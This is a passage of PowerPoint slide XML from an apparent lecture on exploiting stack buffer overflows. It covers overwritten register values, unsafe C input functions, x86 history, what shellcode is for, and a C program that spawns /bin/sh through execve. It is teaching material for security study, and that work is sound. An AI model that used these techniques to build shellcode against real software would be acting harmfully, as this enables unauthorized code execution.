              <a:t>   0x6c6c6166</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0x6c6c6166</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0</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0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0</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0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x31303220</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0x31303220e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194381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en-US" dirty="0"/>
              <a:t>“Overflowing” Functions </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gets() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-- note that data cannot contain newlines or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EOFs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>trcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</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vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</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sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</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fscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>… and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>routines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63736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0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0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0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0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60" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How to Exploit a Stack Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different variations to accommodate different architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assembly instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux buffer overflows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for 32-bit architectures explained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in the paper “Smashing The Stack For Fun And Profit” by Aleph One, published on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Magazine, 49(7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18971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14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14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14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14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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The x86 CPU Family</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>8088, 8086: 16 bit registers, real-mode only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>80286: 16-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>80386: 32-bit registers, 32-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>80486/Pentium/Pentium Pro: Adds few features, speed-up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pentium MMX: Introduces the multimedia extensions (MMX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pentium II: Pentium Pro with MMX instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pentium III: Speed-up, introduces the Streaming SIMD Extensions (SSE) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pentium 4: Introduces the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NetBurst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Xeon: Introduces Hyper-Threading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Core: Multiple cores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AMD Opteron: 64 bit architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29573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1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1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1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1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14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14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14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14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14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147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14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 Code Goal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We want to execute arbitrary code in the vulnerable application's process space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This code has the same privileges as the vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is the standard term for this type of code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Called shellcode because classic example is code to execute /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Really just assembly code to perform specific purpose</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190</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1013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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C-version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B00040"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   name[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   name[1] =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(name[0], name, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>calls in assembly are invoked by saving parameters either on the stack or in registers and then calling the software interrupt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>(0x80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>in L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>inux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13098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4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4531">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453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453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453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453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453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4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a:t>System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
